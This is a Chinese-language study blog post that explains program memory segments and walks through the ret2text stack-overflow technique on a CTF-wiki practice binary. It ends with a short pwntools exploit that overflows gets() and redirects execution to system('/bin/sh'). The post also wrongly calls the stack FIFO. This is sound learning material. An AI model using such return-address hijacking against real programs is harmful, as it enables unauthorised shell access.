[二进制安全学习]ret2text

文章目录

• ​​写在前面​​
• ​​前置小知识​​

• ​​bss段​​
• ​​data段​​
• ​​text段​​
• ​​heap​​
• ​​stack​​

• ​​ret2text​​
• ​​参考链接​​

写在前面

已经学了一小段时间二进制了，以后慢慢确定一个深入的方向吧，开冲

前置小知识

bss段

bss段（bss segment）通常是指用来存放程序中未初始化的全局变量的一块内存区域。

bss是英文Block Started by Symbol的简称。

bss段属于静态内存分配。
比如

int a;

data段

数据段（data segment）通常是指用来存放程序中已初始化的全局变量的一块内存区域。

数据段属于静态内存分配。
比如

int a= 1

text段

代码段（code segment/text segment）通常是指用来存放程序执行代码的一块内存区域。

这部分区域的大小在程序运行前就已经确定，并且内存区域通常属于只读(某些架构也允许代码段为可写，即允许修改程序)。

在代码段中，也有可能包含一些只读的常数变量，例如字符串常量等。

heap

堆是用于存放进程运行中被动态分配的内存段，它的大小并不固定，可动态扩张或缩减。

当进程调用malloc等函数分配内存时，新分配的内存就被动态添加到堆上（堆被扩张）；

当利用free等函数释放内存时，被释放的内存从堆中被剔除（堆被缩减）。

stack

栈又称堆栈，是用户存放程序临时创建的局部变量，

也就是说我们函数括弧“{}”中定义的变量（但不包括static声明的变量，static意味着在数据段中存放变量）。

除此以外，在函数被调用时，其参数也会被压入发起调用的进程栈中，并且待到调用结束后，函数的返回值也会被存放回栈中。

由于栈的先进先出(FIFO)特点，所以栈特别方便用来保存/恢复调用现场。

从这个意义上讲，我们可以把堆栈看成一个寄存、交换临时数据的内存区。

ret2text

ret2text 即控制程序执行程序本身已有的的代码 (.text)

简单来说，就是进程存在危险函数如​​system(“/bin/sh”)​​​或​​execv(“/bin/sh”,0,0)​​的片段，可以直接劫持返回地址到目标函数地址上。

这里我配合ctfwiki上面的进行我的学习,checksec发现只开启了NX保护，NX保护是让栈不可执行

接下来拖入IDA分析，主函数中使用了 gets 函数，显然存在栈溢出漏洞

secure这里又发现了存在调用 system("/bin/sh") 的代码，那么如果我们直接控制程序返回至 0x0804863A，那么就可以得到系统的 shell 了。

这里还得到了它的地址​​0x804863a​​

接下来就是去找偏移了，首先找到

.text:080486A7                 lea     eax, [esp+1Ch]
.text:080486AB                 mov     [esp], eax      ; s
.text:080486AE                 call    _gets

栈从高地址向低地址生长，ebp高地址，esp低地址，
可以看到该字符串是通过相对于 esp 的索引，所以我们需要进行调试，将断点下在 call 处，查看 esp，ebp

得到esp是0xffffd130，ebp是0xffffd1b8，s 相对于 esp 的索引为esp+0x1c，因此，我们可以推断

可以推断

s 的地址为 0xffffd14c
s 相对于 ebp 的偏移为 0x6c
s 相对于返回地址的偏移为 0x6c+4
得到exp

from pwn import *

sh = process('./ret2text')
target = 0x804863a
sh.sendline('A' * (0x6c+4) + p32(target))
sh.interactive()

查看运行结果

参考链接

​​html​​​​ https://ctf-wiki.org/pwn/linux/stackoverflow/basic-rop/​​